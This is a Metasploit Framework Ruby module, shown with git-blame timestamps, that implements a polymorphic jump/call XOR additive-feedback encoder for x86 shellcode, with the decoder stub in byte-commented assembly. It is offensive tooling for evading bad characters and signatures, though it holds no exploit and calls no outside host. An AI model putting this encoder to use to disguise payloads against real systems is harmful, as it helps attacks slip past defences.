2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-10-02 05:23:59 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2005-07-09 21:22:32 +00:00
|
|
|
require 'msf/core'
|
2005-05-18 06:28:12 +00:00
|
|
|
|
|
|
|
|
2006-01-07 23:38:55 +00:00
|
|
|
###
|
|
|
|
#
|
|
|
|
# "\xfc" + # cld
|
|
|
|
# "\xbbXORK" + # mov ebx, key
|
|
|
|
# "\xeb\x0c" + # jmp short 0x14
|
|
|
|
# "\x5e" + # pop esi
|
|
|
|
# "\x56" + # push esi
|
|
|
|
# "\x31\x1e" + # xor [esi], ebx
|
|
|
|
# "\xad" + # lodsd
|
|
|
|
# "\x01\xc3" + # add ebx, eax
|
|
|
|
# "\x85\xc0" + # test eax, eax
|
|
|
|
# "\x75\xf7" + # jnz 0xa
|
|
|
|
# "\xc3" + # ret
|
|
|
|
# "\xe8\xef\xff\xff\xff", # call 0x8
|
|
|
|
#
|
|
|
|
###
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
|
2005-05-18 06:28:12 +00:00
|
|
|
|
2006-01-08 01:12:34 +00:00
|
|
|
Rank = GreatRanking
|
|
|
|
|
2005-05-18 06:28:12 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
2006-01-07 23:38:55 +00:00
|
|
|
'Name' => 'Polymorphic Jump/Call XOR Additive Feedback Encoder',
|
2005-05-18 06:28:12 +00:00
|
|
|
'Version' => '$Revision$',
|
2006-01-07 23:38:55 +00:00
|
|
|
'Description' => 'Polymorphic Jump/Call XOR Additive Feedback',
|
2005-05-18 06:28:12 +00:00
|
|
|
'Author' => 'skape',
|
2005-07-13 18:54:41 +00:00
|
|
|
'Arch' => ARCH_X86,
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-07-10 20:49:13 +00:00
|
|
|
'Decoder' =>
|
|
|
|
{
|
|
|
|
'KeySize' => 4,
|
|
|
|
'BlockSize' => 4,
|
|
|
|
})
|
2005-05-18 06:28:12 +00:00
|
|
|
end
|
|
|
|
|
2005-11-11 01:22:03 +00:00
|
|
|
#
|
2006-01-07 23:38:55 +00:00
|
|
|
# Generates a polymorphic version of the jmp/call/additive stub.
|
|
|
|
#
|
|
|
|
def decoder_stub(state)
|
|
|
|
if (state.decoder_stub == nil)
|
2006-04-26 05:14:55 +00:00
|
|
|
block = generate_decoder_stub(state) || (raise BadGenerateError)
|
2006-01-07 23:38:55 +00:00
|
|
|
state.decoder_key_offset = block.index('XORK')
|
|
|
|
state.decoder_stub = block
|
|
|
|
end
|
|
|
|
|
|
|
|
state.decoder_stub
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Append the termination block.
|
2005-11-11 01:22:03 +00:00
|
|
|
#
|
|
|
|
def encode_end(state)
|
|
|
|
state.encoded += [ state.key ].pack(state.decoder_key_pack)
|
|
|
|
end
|
|
|
|
|
2006-01-07 23:38:55 +00:00
|
|
|
protected
|
|
|
|
|
|
|
|
#
|
|
|
|
# Does the actual stub generation.
|
|
|
|
#
|
2006-01-18 15:43:48 +00:00
|
|
|
def generate_decoder_stub(state)
|
2006-01-07 23:38:55 +00:00
|
|
|
key_reg = Rex::Poly::LogicalRegister::X86.new('key')
|
|
|
|
endb = Rex::Poly::SymbolicBlock::End.new
|
|
|
|
cld = Rex::Poly::LogicalBlock.new('cld', "\xfc")
|
|
|
|
init_key = Rex::Poly::LogicalBlock.new('init_key',
|
|
|
|
Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK' })
|
|
|
|
popeip = Rex::Poly::LogicalBlock.new('popeip', "\x5e")
|
2006-01-08 01:16:49 +00:00
|
|
|
pusheip = Rex::Poly::LogicalBlock.new('pusheip', "\x56")
|
2006-01-07 23:38:55 +00:00
|
|
|
xor = Rex::Poly::LogicalBlock.new('xor',
|
|
|
|
Proc.new { |b| "\x31" + (6 + (8 * b.regnum_of(key_reg))).chr })
|
|
|
|
lodsd = Rex::Poly::LogicalBlock.new('lodsd', "\xad")
|
|
|
|
add = Rex::Poly::LogicalBlock.new('add',
|
|
|
|
Proc.new { |b| "\x01" + (0xc0 + b.regnum_of(key_reg)).chr })
|
|
|
|
test = Rex::Poly::LogicalBlock.new('test', "\x85\xc0")
|
|
|
|
jnz = Rex::Poly::LogicalBlock.new('jnz',
|
|
|
|
Proc.new { |b| "\x75" + [ (0x100 - (b.offset_of(b) - b.offset_of(xor) + 2)) ].pack('C') })
|
|
|
|
fin = Rex::Poly::LogicalBlock.new('ret', "\xc3")
|
|
|
|
jmp = Rex::Poly::LogicalBlock.new('jmp')
|
|
|
|
call = Rex::Poly::LogicalBlock.new('call',
|
|
|
|
Proc.new { |b| "\xe8" + [ (-(b.offset_of(endb) - (b.offset_of(jmp) + 2))) ].pack('V') })
|
|
|
|
jmp.add_perm(
|
2006-01-08 01:10:45 +00:00
|
|
|
Proc.new { |b| "\xeb" + [ (b.offset_of(fin) + 1 - (b.offset_of(b) + 2)) ].pack('C') })
|
|
|
|
|
|
|
|
# These blocks can be in lots of different places, but should only be
|
|
|
|
# used once.
|
|
|
|
cld.once = true
|
|
|
|
init_key.once = true
|
2006-01-07 23:38:55 +00:00
|
|
|
|
|
|
|
# This can be improved by making it so init_key and cld can occur
|
|
|
|
# anywhere prior to pusheip.
|
|
|
|
fin.depends_on(jnz)
|
|
|
|
jnz.depends_on(test)
|
|
|
|
test.depends_on(add)
|
|
|
|
add.depends_on(lodsd)
|
|
|
|
lodsd.depends_on(xor)
|
|
|
|
xor.depends_on(pusheip)
|
|
|
|
pusheip.depends_on(popeip, init_key, cld)
|
2006-01-08 01:10:45 +00:00
|
|
|
call.depends_on(fin, init_key, cld)
|
2006-01-07 23:38:55 +00:00
|
|
|
jmp.next_blocks(call)
|
2006-01-08 01:10:45 +00:00
|
|
|
jmp.depends_on(init_key, cld)
|
2006-01-07 23:38:55 +00:00
|
|
|
|
|
|
|
jmp.generate([
|
|
|
|
Rex::Arch::X86::ESP,
|
|
|
|
Rex::Arch::X86::EAX,
|
2006-01-18 15:43:48 +00:00
|
|
|
Rex::Arch::X86::ESI ], nil, state.badchars)
|
2006-01-07 23:38:55 +00:00
|
|
|
end
|
|
|
|
|
2009-06-14 21:30:56 +00:00
|
|
|
end
|